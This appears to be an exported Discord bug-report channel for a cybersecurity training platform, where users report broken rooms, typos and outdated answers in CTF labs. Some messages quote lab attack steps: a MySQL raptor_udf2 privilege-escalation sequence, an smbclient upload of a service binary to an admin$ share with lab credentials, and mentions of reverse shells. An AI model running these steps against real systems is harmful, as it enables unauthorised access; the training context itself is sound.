#room-bugs

1 messages ยท Page 3 of 1

wide nymph
#

I'd happily write a data fix script but I need more than a crystal ball to devise the structure ๐Ÿ˜

steel hearth
#

I have it in Day 2, so it probably happened more than once)

wide nymph
steel hearth
#

Well, I think it's gonna be alright ๐Ÿ™‚

wide nymph
#

Have you done any of the previous AoC years? I hadn't so I've gone back and found year 1. It's less user friendly, which makes for a good challenge!

steel hearth
crimson atlas
#

The windows local persistence room is super buggy. Not possible to get all flags unfortunately
I am at flag9 in task5 Abusing task scheduler. I get the reverse shell and i am NT Authority but i still can't open that flag

marsh rivet
#

Hey, in the room "Active Reconnaissance" from the Junior Pentester Path, in Task 6 "Netcat" on the last paragraph the text says "You can find a recording of the process below.", but there is no recording present.

wide nymph
#

I'm revisiting the ghosts of christmas past and looking at the first AoC /25daysofchristmas. The service on Task 14 [Day 9] Requests appears to be down ( 10.10.169.100:3000 )
Evidence and Question screenshots included.

quaint sparrow
#

This is a known machine to not work anymore.

You'll need to be creative in how you get the answer.

rugged dawn
#

In the Windows Event Logs Room, Task 4 Get-WinEvent questions 3 and 4 are asking to execute a command from example 8 and 9 but for me the description ends with example 3. Is that a bug on my side or was this accidentally deleted while updating portions of the task?

worldly tapir
#

hello!. i want to report a small typo in the red team fundamentals rooms

#

red team fundamentals -> task 6 overview of a red team engagement -> view site -> slide 5: emulating TTP: lateral movement

slow shadow
dusky junco
#

-banspam 448555703163027467

livid escarpBOT
#

๐Ÿ”จ Banned Souza#6271 indefinitely

sinful meteor
#

Hello, I think the CompTIA Pentest+ "Tutorial" section might be bugged, it gave no points when answered

lost plank
#

Just making my way through the content, and in "Introductory Networking" a question: Which layer checks received packets to make sure that they haven't been corrupted?
The answer it claims to be correct is 2, however packets are at layer 3, not layer 2. Layer 2 transmits and receives frames.

winged wraith
#

https://tryhackme.com/room/osqueryf8, task 6, "How many services are running on this host?": The wanted answer is 214, which is the number of all services in the services table. However, it is technically not the number of services running ([...] where status='RUNNING';), which would be 73 (at least in my case, not sure how well that translates from machine to machine).

wheat fractal
twin tapir
#

@dusky junco you take down this sub? ^

dusty token
#

https://tryhackme.com/room/adventofcyber4, there is a problem with day 2 where a question appears twice, and when I answer it, it reset after refreshing the page, thus this section can't be validated. After discussing it with my friends, I am the only one with this bug. The question is, โ€œWhat is the IP address of the attacker?โ€
(screenshot https://i.imgur.com/MuHqb1u.png)

#

Don't know If someone had the same issue

silk juniper
#

Hello, I'm encountering issues on metasploitexploitation room. I have my Kali Linux and the subroom (MetasploitMSFVENOM VM), when I switch from one to another, I'm disconnected from the MetasploitMSFVENOM one and it claused all the processes (including the one required to complete the task). What's the workaround ? Just clicking on the VM name in the split view will result in a session restart.

rugged canyon
grand island
#

Pwn101 room machine seems broken

silver blaze
#

Don't know where to post this but in AoC day 13 the last question is regarding results from virustotal, and it seems that this answer changes over time? IN the walkthrough vid by CyberNinja it shows 3 IP addresses but my current results show 4 plus 2 private and it is impossible to determine which of these are the acceptable ones.

rugged canyon
#

kinda shows the problem with using external sources as those can change a lot

rugged canyon
copper tide
#

Hello

#

I believe there is a small error in this room. The correct thing would be file2.yar instead of files2.yar.

#

@dusky junco

twin tapir
copper tide
quaint sparrow
copper tide
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

copper tide
#

Oops, it looks like the tool only thanks one! :S

edgy basin
#

Tiniest little room bug on Day 16 AoC 4: The ElfChat message before Flag 3 has the text link "regular link for the Animal Farm," - but the a href of that link is just the IP address and port, without the p.thmlabs.com proxy

austere plover
#

Not a bug, more like room needs an update (i think so), Red Team Recon, Task-6, recon-ng, module google_site_web no longer returns any info, returns [!] Google CAPTCHA triggered. No bypass available.

quick patrol
#

My daily hacking streak instantly starts with one.
Even i didn't miss it...
Is this a bug or anything else.

rugged canyon
worldly tapir
#

hello! small error here. "dissus" -> "discuss"

#

room red team engagements -> task 9 mission plan -> view site -> section: Execution Variants

wheat fractal
#

good morning THM staff, hope all is well ๐Ÿ™‚
AoC, Day 17, under Client-side vs Server-side; the word are is missing, and the spacing looks a bit off (not sure if that was intentional to match word location better given the image off to the left)

cedar creek
#

Working through some basic free rooms and found this typo in the "What is Networking?" room ( https://tryhackme.com/room/whatisnetworking/ ) under task 2:
"It wasn't until this point that the Internet wasn't used asโ€ฆ"
Suggested change: the 2nd wasn't should be changed to was.

cedar creek
#

Another typo in the same room ( https://tryhackme.com/room/whatisnetworking/ ). Now under task 4:
The screenshot show the average ping respons time as 4.160 ms. The text below states it as 5.3 seconds (pretty horrible response time if you ask me!).
Also the min/avg/max times in the "View Site" window are not correct.

elfin ember
#

I think I found a Error in todays task of the advent of cyber

dusky junco
#

thanks!

warm dagger
#

Hello, there's one image that is not loading "bad request" error in networkservices2 room Task2

frank cargo
#

Hi guys, just wanted to do the sql injection room - everytime I start the machine, I get a 502 bad gateway or timeout by the nginx server

#

working now, but hat to terminate a few times

quaint sparrow
#

You should give the machine 5-10 min(s) for all services to boot up.

kindred minnow
#

I believe I found a bug in one of the AoC rooms.

ember prawn
#

Hello guys,
Did any of you already cloned a room with a lab like https://tryhackme.com/room/breachingad ?
When I clone it I am not able to access to the network, is that normal ?
Thanks for your help ๐Ÿ™‚ !

quaint sparrow
#

Or are you using the attackbox?

quaint sparrow
ember prawn
#

I already send an email to hello@thm but I did not get any answer yet :/

glad badger
ember prawn
glad badger
green flume
#

hi. Hydra room is bugged?

#

first of all, description doesnt lead to solution, had to watch a video but after getting the flags nothing happens. I cant progress

ruby robin
#

Hi Network Services 2 room has a missing image related to NFS.

terse sphinx
#

I think the website for ntlm auth in the breachingad room is not working: http://ntlmauth.za.tryhackme.com/

I am connected to the network vpn and have also tried on the attack box

vivid drift
#

https://tryhackme.com/room/commonlinuxprivesc in Task 4 the url needs to be changed to https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh so it can work again. The url which is now shown does download the whole git page html document instead the script itself.

Otherwise it leads to the error which another user and me encountered: #room-help message

In Task 8 I would add to go out of vi with "exit" and then ":q!" and then again exit, because a complete beginner might get stuck there in an escaped vi.

rigid marten
#

Hi guys!
I am on " [Day 9] Pivoting Dock the halls" - from AOC
I am using the THM AttackBox and found out that on my AttackBox is running Metasploit v5, instead of v6
For this matter:

  • the laravel exploit is not present
  • I tried to use the .rb file from rapid7 - but it still does not work - it does not recognize the "Version" of laravel

How can I "update" my THM AttackBox such that it uses msf6 ?

raw bison
rigid marten
#

thanks! I solved it with my own Kali

wild helm
#

Hi!

I don't know if this is the right room to say this, if not please correct me.

https://tryhackme.com/room/windowsreversingintro room and Loop Sample section says "This is saying move RBX into RAX if RSI is not less than 0x10". However, when you examine the instruction, you will see that RDI is moved to the RAX register, not RBX. You might want to take a look here.

long rapids
glad badger
livid escarpBOT
#

Gave +1 Rep to @long rapids

verbal trout
#

Room: Advent of Cyber 2022 (adventofcyber4)
Task: Task 7 (Day 2)
Question: Question 3 - Use theย lsย command to list the files present in the current directory. How many log files are present?
Issue: Answering the question correctly, but on refresh it is shown as blank. This means this task/day cannot be completed.

glad badger
verbal trout
subtle lodge
#

Hey, sorry if this is the wrong place but the first writeup for WgelCTF is a broken link that sometimes redirects to a fake Windows virus popup:
this is the link

https://www.embeddedhacker.com/2019/10/hacking-walkthrough-thm-wgel-ctf/```
glad badger
verbal trout
bleak haven
#

in exploiting active directory room in the connection part the given command goes as systemd-resolve --interface exploitad --set-dns $THMDCIP --set-domain za.tryhackme.loc

#

the mistake is the --interface exploitad because the name of the interface is exploitingad and not exploitad

#

it gave me a headache to find out why i could not connect ๐Ÿคฆโ€โ™‚๏ธ

hazy tiger
#

cc @glad badger could we get this checked?

glad badger
#

Checking now @bleak haven @hazy tiger

glad badger
livid escarpBOT
#

Gave +1 Rep to @bleak haven

raven tendon
#

Can someone send me the file from here?

rugged canyon
#

hmmmm

rugged canyon
#

not sure if we are allowed to do this but lets risk it

raven tendon
#

thank you

verbal trout
glad badger
verbal trout
livid escarpBOT
#

Gave +1 Rep to @verbal trout

stiff plank
#

This is not a bug, just a typo

#

There is a small typo in Task 22:
Check out Simply Cyber's video walkthrough for Day 21 here!
It says day 21 instead of 22

#

In the advent of cyber 2022 room

glad badger
livid escarpBOT
#

Gave +1 Rep to @stiff plank

glad badger
glad badger
bleak haven
glad badger
bleak haven
glad badger
supple forge
supple forge
ruby zealot
#

Hi, in https://tryhackme.com/room/btsysinternalssg Task 9, it looks like the expected answer is outdated (C:\agent_work\112\s\Win32\Release\ZoomIt.pdb, found it in a writeup).
Running strings on ZoomIt.exe gives the following output in the room's VM:
D:\a\1\s\Win32\Release\ZoomIt.pdb
D:\a\1\s\x64\Release\ZoomIt64.pdb

digital depot
#

Hello, the "Intro to Digital Forensics" room has you entering the name of a Street at GPS co-ordinates as a flag. Looks like they may have done some contruction at that location because that street has been turned into a round-about.
Room: https://tryhackme.com/room/introdigitalforensics
Flag: Task 3 - question 2

quaint sparrow
#

However you need to change them.

#

You need to replace the deg with ยฐ then combine them.

so 51 deg 31' becomes 51ยฐ31'

digital depot
#

I'm getting dropped right in the middle of the round-about:

quaint sparrow
#

That's not the right coordinates.

digital depot
#

Oh, I realized I still had the example co-ordinated copied

#

Sorry about the confusion

hazy tiger
#

@dusky junco

dusky junco
#

lol

wide nymph
#

Hey, any update on my room bug (duplicate question issue) with Task 10 AoC - [Day 5] Brute-Forcing? I still can't complete the day so can't enter the raffle for that day or complete AoC and get my badge!

narrow robin
#

Hello guys,

Who can i dm to report a bug ?

hazy tiger
#

Just type it here

#

Staff will pick it up :)

narrow robin
#

Room WebOSINT, task 7, the answer is not that i can find in viewdns.info

dusky junco
stoic yarrow
#

Seems like the task responsible for automating the keystrokes for task 5 - Exploiting Active Directory is broken... been on it for a day.

lofty cloud
trim agate
#

Hi guys,
i got stuck on Enumration AD, task 3
whether is RDP or SSH on THMJP1, the connection keeps tearing down (not the VPN) so I can do nothing ! i am facing the issue from my kali as well as THM KaliBox
i managed to make dns working (my kali) so it dosen't seem to be related to a dns issue
below the error msg i got via THM KaliBox :
SSL_read: I/O error: Connection reset by peer (104)
Failed to check FreeRDP file descriptor

does anyone come across this issue ?
could yoy help me out because, I spent 3 days on it whitout making progress !

#

the lab was reset though still the same instability...

wheat cradle
scarlet anchor
willow pumice
#

I donโ€™t think it is specific to this room, but on day nine of advent of cyber, I had a machine (not the attack kali machine) That terminated even though I added an hour

scarlet anchor
#

In the phishing analysis fundamentals (https://tryhackme.com/room/phishingemails1tryoe) task 3 the question asks for the port for Secure SMTP. Surely its 587 that everyone knows. It only accepted 465 though (which admittedly I had to look up once 587 failed)

rugged canyon
#

hmmm

#

465 is for smtp over ssl or tls

#

587 seems more generic

rain echo
#

Not sure if this has already been reported (or if it's even the best place to report it), but I believe there is a bug/mistake on Day 13 of AoC. Last task has you to enter the defanged IP's that VirusTotal reports as associated with that file. It does state that VT's entry has changed since the walkthrough, but I believe it has changed yet again and now the accepted answer is not correct. VT Reports 5 TCP addresses, THM only accepts 4. The new one that isn't accepted is: 13.107.4.50

rugged canyon
hazy tiger
rain echo
hazy tiger
#

Does that include the new TCP address that has appeared on VT?

rain echo
#

It does not. The expected input according to the instructions would be: 13[.]107[.]4[.]50,20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76

rugged canyon
#

yeah it used to be only 3 now it is four in the answer

hazy tiger
livid escarpBOT
#

Gave +1 Rep to @rain echo

rugged canyon
#

now shadow is wondering why they did not bother reporting this themselves

rain echo
rain echo
rugged canyon
#

@raw bison โฌ†๏ธ

calm frigateBOT
#

Done!

quaint sparrow
#

@dusky junco

calm frigateBOT
#

Done!

dusky junco
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

silk eagle
austere plover
#

Not sure if its classified as a bug, in Python Basics, Task 5 Logical and Boolean Operators , there is a code:
'name = "bob" hungry = True
if name == "bob" and hungry == True:
print("bob is hungry")
elif name == "bob" and not hungry:
print("Bob is not hungry")
elif: # If all other if conditions are not met
print("Not sure who this is or if they are hungry") '

Last elif should be else or it throws syntax error

#

and first line needs to be split in two lines:
name = "bob"
hungry = True

For someone who knows python it might be obvious, but for someone who learns like me it wasnt

sharp grotto
#

Having the same disconnect problems with reverse shell on port 4444

#

Same problem as @wet fable and both NC and MSF multi/handler reverse reverse shell connection that directly terminates. First time I experience this.

eternal summit
shadow pelican
#

There is a spelling error in the answer to a question in the Intro to lan room. Its question 3 on task 3.

quaint sparrow
#

So answer tolerance has kicked in, giving you one letter out of place as an accepted answer.

shadow pelican
#

address is spelled with two d's right?

quaint sparrow
shadow pelican
#

but it would only accept adress as the answer and not address

quaint sparrow
worldly tapir
#

i'm about to finish AOC 2022. so far, 10 points to the story and content, everything has been working well ๐Ÿ˜

#

i just want to report a small spelling mistake. path: AOC 2022 -> task 26 -> Abusing device behavior. error: applications' <-> application's

eternal summit
native tide
#

There's a bug in the Web Fundamentals learning path. The bug is found on room/uploadvulns task #4.

Open your web browser and navigate to overwrite.uploadvulns.thm. Your goal is to overwrite a file on the server with an upload of your own.

The link doesn't work which means you can't answer the questions

eternal summit
livid escarpBOT
#

Gave +1 Rep to @eternal summit

umbral stream
#

heyo im not sure of its somehting im doing but for like the very first lesson the "gobuster" thingy isnt working

worldly tapir
eternal summit
#

Applications plural on devices

#

The behavior of applications.

worldly tapir
#

in plural is [applications] or [applications']?

eternal summit
#

The plural of application is applications.
If you have something belonging to multiple applications, you use applications'

hazy tiger
#

"Applications's" but you omit the s if there is a preceding s

brazen zephyr
#

10.10.206.224 machine on this ip was bugging

#

the exploitation didnt work

gaunt mesa
#

Signature Evasion\Signature Identification: Task 2
VIP user: AttackBox and/or OpenVPN
Task: Use Linux tools {dd,head,split} to identify a file shell.exe at "C:\Users\Student\Desktop\Binaries\shell.exe"
Machine provided is Windows with no WSL for linux commands. Defender exclusions only exist in C:\Users$User\Desktop
Moving the file to another location will trigger Defender if an smb share were to exist but does not.
Could do one of 1000 ways to tx the file back to the attack box or linux machine over vpn, but seems a little out of the way and is not addressed in this manner

#

you could maybe move the file to C:\xampp\htdocs\uploads\ and try to download quick?

eternal summit
austere plover
#

Ekhm, Linux Privilege Escalation, not sure if intended:

Last login: Fri Jun 18 04:38:27 2021 from 10.0.2.15
Could not chdir to home directory /home/karen: No such file or directory

gaunt mesa
#

meh..

nocturne stratus
tame karma
#

In the Yara room, it appears that yarGen.py is broken. I get an error message about urllib.request (line 25) when I try to use it. I commented out the line and the script appeared to work fine. Some digging around points to possible issues with compatibility between the request and python3, but I'll leave it to you to confirm. @dusky junco

spark wraith
#

Room: Phishing Analysis Fundamentals
Task: 6 - Types of Phishing
Bug: The link at the end of the task (about defanged Hyperlinks / IP addresses) is broken and leads to an 404 site.

dusky junco
vocal sierra
#

Hi all, there's a bug within room "Agent Sudo" in task 3 where it asks for SSH password(it accepts the wrong password), but it is different from the actual ssh password

brazen zephyr
eternal summit
brazen zephyr
#

oh ok sorry

#

room is lockdown and its the first task user.txt

gaunt mesa
winged sparrow
#

https://tryhackme.com/room/registry4n6
I think that the first octet in the following question's answer and hint should probably be 172, not 173.
"What is the Last DHCP IP assigned to this host?"

copper rain
#

hello guys I have a few questions about Kali cri

eternal summit
tame karma
#

I believe that I tried that yesterday and it told me that it didn't have an internet connection. I'll try again

#

Here's a screenshot of the message

#

Also, the instructions say that I need to do that if I'm running it on my own system.

dusky junco
#

Yup, the machines donโ€™t have internet access. Youโ€™re not expected to update yarGen, just use the commands like this (sorry for the bad crop Iโ€™m on mobile atm and canโ€™t fit the whole command In)

tame karma
#

It's OK. I appreciate the help. I ran that yesterday.

dusky junco
tame karma
#

Right, I am running it in the THM system in split view.

#

I hope I'm not disrupting your NYE celebration

dusky junco
#

Haha naw youโ€™re not but thanks. Iโ€™m ill atm so Iโ€™m having a chill evening in

tame karma
#

Feel better

abstract flicker
#

Wondering if anyone has experienced the same issue.

shut basalt
#

hi my friends

#

I don't know if Snort Basics has somethig wrong

#

any know if the questions have something wrong or I have to try harder

eternal summit
shut basalt
#

thank you for your hint

rain echo
#

Not so much a bug, but what believe to be a grammar mistake in 'The Lay of the Land' room (https://tryhackme.com/room/thelayoftheland) Under Task 1 - Introduction, one of the sentences reads:

"In this room, the assumption is that we have already gained access to the machine, and we are ready to expand our knowledge more about the environment by performing enumerating for the following"

I feel like the word 'enumerating' is meant to actually be 'enumeration' in this case?

halcyon mango
#

Hi, it seems that the willow room is not working (https://tryhackme.com/room/willow). I get the following error when trying to connect over ssh : โ””โ”€$ ssh -i key willow@10.10.169.127 Enter passphrase for key 'key': sign_and_send_pubkey: no mutual signature supported willow@10.10.169.127's password:

eternal summit
#

Nothing wrong with the room.

halcyon mango
#

Ok, got it.

fallow tide
#

HI there. Room "Anthem" seems to have a problem. I cant connect to the machine, neither via openvpn nor the attackbox (no ping, no nmap, no http) -> According to the questions to answer, this canยดt be the desired behaviour... rebooted the machine twice, too. Could somebody doublecheck pls?

rugged canyon
fallow tide
#

i did -> same result. but the machine is expected to spawn a web server too which never shown up

rugged canyon
#

hmm okay just wanted to check on of the most common misses

fallow tide
#

thanks for that anyway ๐Ÿ™‚

rugged canyon
#

going to check if it is wonky or if it works for shadow... just wait a few mins

#

works fine for shadow

#

nmap detects http port and rdp port

#

and the website loads

fallow tide
#

Thank you @rugged canyon

i was waiting for 45 minutes now doing nothing...tried it again - works. maybe it was a temporary thing...? Anyway, kudos for checking it ๐Ÿ™‚

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

no probklem

#

thanks for basicly recommending a ctf room to shadow

restive barn
#

Hi! If its not a feature being worked on, I'd like to suggest a function that alerts users that some questions/answers maybe outdated for certain CTF rooms.

For example - https://tryhackme.com/room/webosint

Referencing the forum posts, the answers to the first set of questions have changed since the room was originally created and some posts to links/solutions to what the answers are have been provided.

Having an alert/pop-up to notify users would be especially helpful for newcomers who are wanting to practice anything they have recently learnt ๐Ÿ™‚

rotund crystal
#

Just a little bug in the windows privelage escalation room, task 4

eternal summit
#

There's several windows privesc rooms, please link to it.

rotund crystal
#

For the always installed elevated section the msfvenom command displays "ATTACKING_10.10.X.X" when it should display "ATTACKING_MACHINE_IP"

idle comet
#

Signature Evasion Task 6, you can upload any file (even empty one) with just name challenge-2.exe and when you upload it you get the flag, so the backend system look is not checking at all what is on the file, just the file name

tame karma
#

Hello. Two more issues with the Yara room. 1. The VNC menus used to copy and paste are missing. It becomes an issue in Task 10 because I have to copy two long file hashes.

#

Issue 2 is that question 2 in task 10 asks for the "first yara rule to detect file 2." It seems that the yara rules might be loading in a different order. The answer is now the third listed rule.

rocky path
rugged canyon
rugged canyon
rocky path
#

pod has status Running / unfortunately i have no knowledge to verify if I am in the pod .. I am trying to google it but without success at the moment, sorry. flat.txt if just mistake.

rugged canyon
#

shadow dunno too.... they just know that in some rooms you are ment to escape the container to get the root flag ยฏ_(ใƒ„)_/ยฏ

rocky path
#

hmm, I can "cat" /etc/shadow and rest /etc but i can't ls is showing nothing in /home also :D. Probably I am doing something wrong .. but don't know what...

#

sorry all i find problem ๐Ÿ˜„ I make mistake ...

#

room work perfectly ๐Ÿ˜„

spiral flume
#

Hello. Room https://tryhackme.com/room/hololive.
I cant download the vpn file, always got a 404 error. It seems that this problem is occuring from at least the 16/08/2021 till now.

rugged canyon
spiral flume
#

@rugged canyon , i will try that, thanks !
Could it be pined to the holo channel for others ?

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

well no idea how shadow would control that

austere plover
#

Room LinuxPrivEsc - either im doing something wrong, or something is wrong ๐Ÿ˜„
mysql> create function do_system returns integer soname 'raptor_udf2.so';
ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 22 /usr/lib/mysql/plugin/raptor_udf2.so: cannot open shared object file: No such file or directory)

austere plover
#

##----------------Quick fix for above (not really) -----------------------##

escalate to root
cp raptor_udf2.so /usr/lib/mysql/plugin/raptor_udf2.so
exit
continue with mysql fun and escalate to root....

yeah i know doesn't make a sense, but at least i could see how raptor works xD

austere plover
#

real solution was, someone already changed it, Thank You! xD i really need to learn mysql...
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

analog moon
glad badger
analog moon
livid escarpBOT
#

Gave +1 Rep to @glad badger

fervent finch
#

Hello, not sure if this is the appropriate place to report/discuss this but I'd like to verify something.

I'm in the Introductory Networking, Task 6, Question "What switch would you use to specify an interface when using Traceroute?"

I'm using Ubuntu 22..04.1. When I do a 'man traceroute' I don't see the -i switch mention to change the interface. I took a guess at it and got the answer correct though and I'm not sure how/why.

Why isn't this switch documented in the man pages that were displayed to me?

wheat fractal
#

Hi. I'm not sure if this is a room bug but I'm on
OWASP Top 10 room and wasn't able to connect to the Start Machine IP. Nothing has changed on my end, I completed task 19 yesterday without any issues. I tried on both cellular connection and on my fibre connection.

eternal summit
hazy tiger
livid escarpBOT
#

Gave +1 Rep to @hazy tiger

wheat fractal
vast carbon
#

Hello, I was doing the Benign room and I can't answer the penultimate answer (without reading a writeup that has the answer) because to get the flag I must connect to the link given in the Splunk logs, but when I try, with and without VPN connection, I get an error:

#

If the webpage is not active anymore, how am I supposed to get the flag?
Is there another way to get it from Splunk or is it a "bug" because the webpage is not longer active?

lapis yew
#

is advent of cyber 2 still up ?

#

because when i tried to do day1 i couldn't finish it

#

even when i did exactly what the writeups said

quaint sparrow
#

All the AoC are still up, there is a room in one of them (day 9) that you can't do, everything else is fair game.

pastel tangle
#

where can i find help for the vulnnet box

quaint sparrow
rugged canyon
#

the aoc for 2019 day 9 is 100% broken yes... aoc for 2022 is not broken if you use your own vm or have a subscription

pale rock
#

Hi there is an error in the Wireshark: Traffic Analysis room. Task 6 "Cleartext Protocol..." First Question Hint says "FTP code 503" should be FTP code 530

flat socket
#

@dry blade The "Ghizer" room is broken, anonymous FTP requires username and password

sick stream
#

I dont know if was supossed to be a guessing question (really that would be awkward)

#

But was easy to guess just for knowing the length of the word

#

Also i dont know if this counts as a bug

#

But is a thing that maybe im not the only one who made

nimble locust
#

Some of the answers across the platform are definitely guessable, but the point of the exercises is for you to learn / practice, right? It is definitely possible to guess or look up answers, but you're only kind of screwing yourself over that way.

sick stream
#

Ok

night python
#

It seems like "Hide Completed" in My Rooms is broken. It does not work now. Anyone has the same issue?

spare terrace
#

its a known issue lol

long rapids
#

I'm doing the Advent of Cyber 2 (2020) https://tryhackme.com/room/adventofcyber2 and in day 4 (Task 9), the hack box location for the word list is no longer valid. /opt/AoC-2020/Day-4/wordlist. Also, there are two recommended rooms linked at the bottom of this task. Both links lead to inaccessible Rooms:

rugged canyon
#

brainstorm ( https://tryhackme.com/room/brainstorm ) task 1 question 2 seems to be wrong... even scanning both tcp and udp ports gives a result of 3 when the answer is apparently supposed to be ||6||

rancid river
brazen zephyr
silver blaze
#

AoC day 21, don't bother trying to use your own machine.....
tell me THM doesn't value free users without telling me that THM doesn't value free users...

eternal summit
still elk
#

hi, for Island Orchestration. I scanned ports and I got 3 port open. then 2 out of 3 services became unreachable. It's minikube instance. And i'cant bind to web ports.

still elk
dusty ibex
#

Anyone have any issues with the Mr Robot CTF? I don't want to give anything away, but I am finding the webapp is essentially unresponsive so I am unable to customize the any of the page templates. I have restarted both the room and the attackbox multiple times with no improvement. Any ideas?

rugged canyon
#

sounds more like tech support questions but nope it worked neatly for shadow when they did it 3 months back

#

and doubt anything changed since then

shell jay
#

Anyone have this issue with the creddump7 tool from the windows priv esc room task 11

#

I thought this was already fixed for python3, but seems to have python2 syntax

rugged canyon
#

pyenv to the rescue

shell jay
rugged canyon
# shell jay how specifically

This video will show you how to install and run different Python versions on Ubuntu and Debian Linux using pyenv. You will learn to seamlessly switch between multiple Python versions and set specific Python versions for dedicated folders. Additionally, we will set up virtual environments (virtualenv) for your Python projects and use them in Visu...

โ–ถ Play video
#

lets you set to use python 2.7.18 for that directory to run the script using that version of python

shell jay
#

Great thank you!

rugged canyon
#

no problem

#

pyenv and python virtualenv/venv helps a huge amount for using python stuff

shell jay
rugged canyon
#

virtualenv keeps your instance of python different... pyenv keeps the version of python different

#

they work together neatly

shell jay
rugged canyon
#

hmmm maybe.... you might be missing pip packages that need to be installed... which is where you would use both virtualenv and pyenv

shell jay
#

seems way too much troubleshooting to run this file lol

rugged canyon
#

ยฏ_(ใƒ„)_/ยฏ

shell jay
#

hmm

#

The room and task 11 has not been fixed since people complaining from 2021

rugged canyon
#

yeah.....

shell jay
# rugged canyon yeah.....

I guess since python3 is giving a python2 error and python2 is giving a module not found for crypto.hash. I could start a virutalenv and use the python2 pyenv and download that crypto.hash module. But looking that up seems like it's not available anymore

rugged canyon
#
pyenv local 2.7.18
python -m virtualenv .venv
source .venv/bin/activate
python -m pip install crypto.hash

profit???

#

or use the attackbox as that should have the tools to make that room work

shell jay
rugged canyon
#

well yeah kinda.. the local part sets it to use said python version in that folder only

shell jay
#

Yeah that's nice

rugged canyon
#

please don't dm shadow

shell jay
rugged canyon
#

weirds

shell jay
#

did it work for you?

rugged canyon
#

dunno how to help ยฏ_(ใƒ„)_/ยฏ

shell jay
livid escarpBOT
#

Gave +1 Rep to @rugged canyon

crimson gust
#

Hi there, almost 20 minutes i'm trying to connect to port 80 for https://tryhackme.com/room/insekube but the port is still closed, any idea ? I tried the room fews days ago and that was working

still elk
#

i m still waiting for island

crimson gust
#

Sad :/ Hope this will be fix soon, never tried island btw but i'll try after this one

still elk
lofty cloud
#

https://tryhackme.com/room/splunk3zs
splunk Bots V3 room
Task 3 Question 2

What field would you use to alert that AWS API activity has occurred without MFA (multi-factor authentication)? Answer guidance: Provide the full JSON path. (Example: iceCream.flavors.traditional)

The provided awscloudtrail link is no longer valid but can found here now https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html

But anyway the question asks what is the field used to alert AWS activity without MFA
according to the docs though it would be the log for IAM user, successful sign-in without MFA so the answer should be additionalEventData.MFAUsed

But the answer format is wildly different. did some digging around and looks like the answer THM wants is from Root user, MFA changed so answer would become userIdentity.sessionContext.attributes.mfaAuthenticated

which looks to be different from what the actual question is. Also couldn't find any logs that have the mfaAuthenticated field while there are 4 events that cover MFAUsed

hardy charm
#

Uh, I think there is a bug in the Sysinternals room. I am referring to the Network Discovery portion in task 3. Enabling network discovery does not actually work. I'll click enable, save it and it will revert back to the original settings - no save at all. I just tried it on my VM to see if that would fix anything and it does the same thing. Also tried running it as admin and it does the same thing. Don't know if I'm stupid or wat

tldr; I can click save but it doesn't actually save.

tame karma
#

Not sure if this is a bug or not but I typod an answer and it accepted it. In Tactical Detection, Task 2, Answer 2, I entered bad3xe69connection.ip The correct answer should be .iO. But for some reason it accepted the wrong answer. Do you know why that is? Are other people having trouble with this room?

quaint sparrow
quaint sparrow
teal sparrow
#

I already tried to send an email to the tryhackme support but they don't understand me (maybe my english is bad...)

cosmic remnant
#

hello I am having a possible bug with the Zeek room Task 7 final question, my results are off by one. I have screenshots and what all I have run, in a write-up if you'd like to see, but I want to make you aware of it.

pine linden
#

Room: Splunk101, Task: 5, Q1. I believe this answer needs updated. I was getting it wrong and pulled up an old walkthrough and the guy was doing the same thing as me, but his answer event count on the log file was slightly higher. The one I was getting was something like 2812, vs the 2862 which is the right answer.

rustic ginkgo
#

Hi

#

There is a mistake in room "Linux Privilege Escalation" in task 7

#

it talks about the Privilege Escalation with SUID using nano

#

and nano does not have SUID bit set

raw bison
rustic ginkgo
#

Oh right

#

i think that that was the way to do it

#

sorry

#

is there any verified guide?

raw bison
#

Not an issue, the approach is the same as explained in the task, just with a different binary

rugged canyon
#

weird how many people not understand that most of the stuff for that room is examples of how to do it with differing methods to do it for the practical

raw bison
rugged canyon
#

ยฏ_(ใƒ„)_/ยฏ

glad badger
#

Some users read task content as instructive and others have a higher tendency to consider it as read-along. Even when we focus on making the text clearer in its intention, there's still room for users to interpretive reading. ๐Ÿ™‚

rugged canyon
#

yeah good explaining tim

tame karma
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

grim zephyr
#

Hi guys , I'm new to tryhack me in room " soc level 1 --> cyber threat intelligence -- > threat intelligent tool -- > task 4 "
First question is about ioc 212.192.246.30:5555 malware but it throws wrong answer does the correct answer old ?

boreal slate
#

Hey! can any staff reset my Lateral Movement and Pivoting lab? The SMB server is completely bugged,

#

All my smb client commands are giving error messages, even the copy-paste command from the walkthrough gives errors:
smbclient -c 'put myservice.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever

session setup failed: NT_STATUS_LOGON_FAILURE

warm prawn
#

Hey guys, the text in Linux Fundamentals pt 2 section 5 is missing some information and screenshots as compared to the walkthrough video. Just to let you know. Thanks

raw bison
warm prawn
#

It's nothing critical, just for example the screenshot explaining the permissions that is present in the video is not present in the text provided under the section 5.

winged sparrow
still elk
#

island orch. is still buggy. 80 and 8443 is closed

near juniper
#

Hey, EasyCTF room bug... nmap reveals 2 ports under 1000 neither of which is the correct answer for Q2.

rugged canyon
near juniper
ruby light
#

the room at https://tryhackme.com/room/rpnessusredux has an error. The VM has been updated and the task asks ||what version apache server is running. The answer should be 2.4.25, but the room only accepts 2.4.99||

ruby light
oak otter
#

Hi for the room Quotient, remmina is not able to rdp into the machine. Tried using xfreerdp and it allows me to log in but after say 3 minutes(?) or less, the RDP connection gets disconnected. I terminated and restarted machines 3 times already but still face the issue

raw bison
rugged canyon
rugged canyon
dusky junco
#

@green steppe ^^ pls fix โค๏ธ

green steppe
dusky junco
#

oh wait is that the joke? KEKW

green steppe
#

yes i moved blogs, i bet the URL is different on my blogs side

dusky junco
calm frigateBOT
#

Done!

near juniper
livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

it is simple... guess you just have not learnt of the prerequisites yet

near juniper
